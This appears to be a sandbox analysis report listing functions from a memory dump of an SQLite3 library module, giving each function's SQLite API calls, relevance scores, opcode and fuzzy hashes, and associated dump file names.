                                                                                                  • Opcode ID: eaeb5d4f04b2240e7345ce3abc7e1e537745693286038efdf120484f77ac5f6c
                                                                                                  • Instruction ID: 8caeeb31c19c30b4738e64d16e9469ccd75e5ff7a5b1c36905c7be360b132cf5
                                                                                                  • Opcode Fuzzy Hash: eaeb5d4f04b2240e7345ce3abc7e1e537745693286038efdf120484f77ac5f6c
                                                                                                  • Instruction Fuzzy Hash: 08018174A486494BDB00AFB9D8D1619B7F4AF8431DF28C879DC458F701E331D9908792
                                                                                                  Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                  • API String ID: 1646373207-328863460
                                                                                                  • Opcode ID: ce5ab38425697930a800b2348ac401b836140ab2309116c1bc60823ae432f09a
                                                                                                  • Instruction ID: 88f95a5b0fc1a36e83fcc666651b847593a6fc42c27ba52e91ddc10983a2a93f
                                                                                                  • Opcode Fuzzy Hash: ce5ab38425697930a800b2348ac401b836140ab2309116c1bc60823ae432f09a
                                                                                                  • Instruction Fuzzy Hash: 1DE06DB4508B058BF7106FA5840672EBAB9AFC170EF62C81CD491862A0E634C891CB73
                                                                                                  Function 61E20831 Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E20898
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E209AF
                                                                                                  • sqlite3_result_error_code.SQLITE3 ref: 61E20AD2
                                                                                                  • sqlite3_result_double.SQLITE3 ref: 61E20AE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                  • String ID:
                                                                                                  • API String ID: 4229029058-0
                                                                                                  • Opcode ID: 339ce6c8fa329e2159c3165952219dd1c3493894be6fb33ea27d3c6214bf86be
                                                                                                  • Instruction ID: 45d4b300d58ab8dc2b51059bb67f3d253909563595da8c0b5c83a0b0393edce8
                                                                                                  • Opcode Fuzzy Hash: 339ce6c8fa329e2159c3165952219dd1c3493894be6fb33ea27d3c6214bf86be
                                                                                                  • Instruction Fuzzy Hash: 9DA116B0A04609DFDB01DF69C594A8EBBF5FF88314F218929E889E7354EB31D951CB81
                                                                                                  Function 61E202DC Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 2374424446-0
                                                                                                  • Opcode ID: 836ed8021e88d929f635eadc4386c06fcf42673ea3f0fc6bab26bbdca49803ff
                                                                                                  • Instruction ID: 6ac0993a4910acfd752c1271c193818a4eef371ac2cacdf2036077b75b948d8b
                                                                                                  • Opcode Fuzzy Hash: 836ed8021e88d929f635eadc4386c06fcf42673ea3f0fc6bab26bbdca49803ff
                                                                                                  • Instruction Fuzzy Hash: E2512A74D04359CFEB10CFA8C894B9EBBF1BF45318F1085A9D448AB281D7759A84CF52
                                                                                                  Function 61E21A7F Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E21AB7
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_value_dup.SQLITE3 ref: 61E21B0A
                                                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E21B3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                  • String ID:
                                                                                                  • API String ID: 405757302-0
                                                                                                  • Opcode ID: 23f32d968876495cc2466569d6e3a70bbd3d708e3568469acff148bc67b735ee
                                                                                                  • Instruction ID: e843903b77586eca95070302ed3968e175ede67b53b8a1002c3728e5b8302022
                                                                                                  • Opcode Fuzzy Hash: 23f32d968876495cc2466569d6e3a70bbd3d708e3568469acff148bc67b735ee
                                                                                                  • Instruction Fuzzy Hash: 26311B75A04219CFCB00DFA9C4C199EBBF1FF88314F15856AE848AB311E735E992CB90
                                                                                                  Function 61E3C1BD Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E3C1C9
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E3C1E9
                                                                                                  • sqlite3_vfs_find.SQLITE3 ref: 61E3C228
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E3C327
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                  • String ID:
                                                                                                  • API String ID: 321126751-0
                                                                                                  • Opcode ID: c7fb295c7c4fafc45fc31961be73fcc8f43c58e2ca488124634f316559f0ba0a
                                                                                                  • Instruction ID: 22c0f88c5b06d876445ec190bf5dde36953c23e2b57f9d2c0a2a01f592960467
                                                                                                  • Opcode Fuzzy Hash: c7fb295c7c4fafc45fc31961be73fcc8f43c58e2ca488124634f316559f0ba0a
                                                                                                  • Instruction Fuzzy Hash: 9E417E3495E7F88EC7129B7885807D97FB1DBD6B08F1884D9C4C887352C236C5A9CB61
                                                                                                  Function 61E270C9 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                  • String ID:
                                                                                                  • API String ID: 3596987688-0
                                                                                                  • Opcode ID: cb68b6a65082d018b6cfcb4ca6be36277b7b3163969adda79eea7602827c0f4b
                                                                                                  • Instruction ID: a5d0ba820aa02c776048322127c14ad84011fd730f87f6df5ddd70e6a7576ed0
                                                                                                  • Opcode Fuzzy Hash: cb68b6a65082d018b6cfcb4ca6be36277b7b3163969adda79eea7602827c0f4b
                                                                                                  • Instruction Fuzzy Hash: 2E31D5B19047059FC740DF69C89169EBBF4BF88364F24C92DE4A8D7390D734D8518B91
                                                                                                  Function 61E24D5D Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E24DD3
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E24E6B
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E24E8B
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E24E93
                                                                                                    • Part of subcall function 61E11F58: sqlite3_free.SQLITE3 ref: 61E11FFE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082161338-0
                                                                                                  • Opcode ID: 9cc4633a097e73c785436aae75047dee1b6240351f367b22dd09a06025fac2d8
                                                                                                  • Instruction ID: 4f5da2dd7615b2eb881f19983d549a637049a25a588ff212f0f7a96383ee719e
                                                                                                  • Opcode Fuzzy Hash: 9cc4633a097e73c785436aae75047dee1b6240351f367b22dd09a06025fac2d8
                                                                                                  • Instruction Fuzzy Hash: 7B31B2B09083469FD700AFA9D85875EBBF4BF89748F20C81EE4989B344D778C5458F92
                                                                                                  Function 61E19B93 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E19BAD
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E19BF5
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E19C1C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E19C4A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2308590742-0
                                                                                                  • Opcode ID: d89d64678471a1f8eaa0b26950648ad6bf8344a61e300e038ea6a6d6074813ce
                                                                                                  • Instruction ID: e8b593a480feb69e6eb6e99c399a69271dc676901c87b9747d9d713bcc23c061
                                                                                                  • Opcode Fuzzy Hash: d89d64678471a1f8eaa0b26950648ad6bf8344a61e300e038ea6a6d6074813ce
                                                                                                  • Instruction Fuzzy Hash: 8921AE7160C2458BE709CEAA868275B7BE6AFC5308F39C468DCD88B349D379D8428751
                                                                                                  Function 61E138F3 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13921
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13978
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13995
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E139BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: c7364baebfeb13ff3c5be88adfa2a9a980a14eef26289108b078d707b2a116aa
                                                                                                  • Instruction ID: 772148bc7e821bcb3ed9a10c75e8407ae2ab03996a597532b47a9ca482f9e13f
                                                                                                  • Opcode Fuzzy Hash: c7364baebfeb13ff3c5be88adfa2a9a980a14eef26289108b078d707b2a116aa
                                                                                                  • Instruction Fuzzy Hash: A1118175A98B518FCB00EFB8C1C161D3BF5EBC6358B29842ED984CB318E779D8848B51
                                                                                                  Function 61E266A3 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 3779612131-0
                                                                                                  • Opcode ID: f3fd841dbc7e1a27be78ec7f56b122aa93494257763477640ceeec2e001bf682
                                                                                                  • Instruction ID: 86e8dfc9088e1679b618ef5a14f72c6b18750a28c270dd8156800976f8685cae
                                                                                                  • Opcode Fuzzy Hash: f3fd841dbc7e1a27be78ec7f56b122aa93494257763477640ceeec2e001bf682
                                                                                                  • Instruction Fuzzy Hash: C6115EB16047899BCB00AF69C89568A7BA1FB48374F24CB2DED648B390E734D5118F81
                                                                                                  Function 61E250BF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                                                                                  • String ID:
                                                                                                  • API String ID: 1185593704-0
                                                                                                  • Opcode ID: 42319b2c429c97c8b3de8700ca36a038db7d41a21011acf3a9deba55146c7e36
                                                                                                  • Instruction ID: b0074966d255c7de4e2d00f28f0b06c4639ed4f7b3ec8dde34355c4b790c1683
                                                                                                  • Opcode Fuzzy Hash: 42319b2c429c97c8b3de8700ca36a038db7d41a21011acf3a9deba55146c7e36
                                                                                                  • Instruction Fuzzy Hash: C61170716047449FDB10DF68CA88B9ABBE5BF84318F25C96DE888CB309DB74D844CB91
                                                                                                  Function 61E398C8 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E398E0
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E39908
                                                                                                  • sqlite3_mprintf.SQLITE3 ref: 61E39919
                                                                                                    • Part of subcall function 61E37BD6: sqlite3_initialize.SQLITE3 ref: 61E37BDC
                                                                                                    • Part of subcall function 61E37BD6: sqlite3_vmprintf.SQLITE3 ref: 61E37BF6
                                                                                                  • sqlite3_create_function_v2.SQLITE3 ref: 61E3995E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 946922136-0
                                                                                                  • Opcode ID: 762e03255e877fef10a29fa1cefa8723e4052f6677c66d1ee54295376bd0f4da
                                                                                                  • Instruction ID: c4986ef056de697bed77b2905fcd510c0a8e87b2198c09053346e1666aa96040
                                                                                                  • Opcode Fuzzy Hash: 762e03255e877fef10a29fa1cefa8723e4052f6677c66d1ee54295376bd0f4da
                                                                                                  • Instruction Fuzzy Hash: CD1115B4A083128BD700AF69C48075AFBF5EFC4758F24C82DE8889B304D7B9D945CB92
                                                                                                  Function 61E8F2D1 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F2DD
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F2F7
                                                                                                  • sqlite3_realloc64.SQLITE3 ref: 61E8F32C
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E8F354
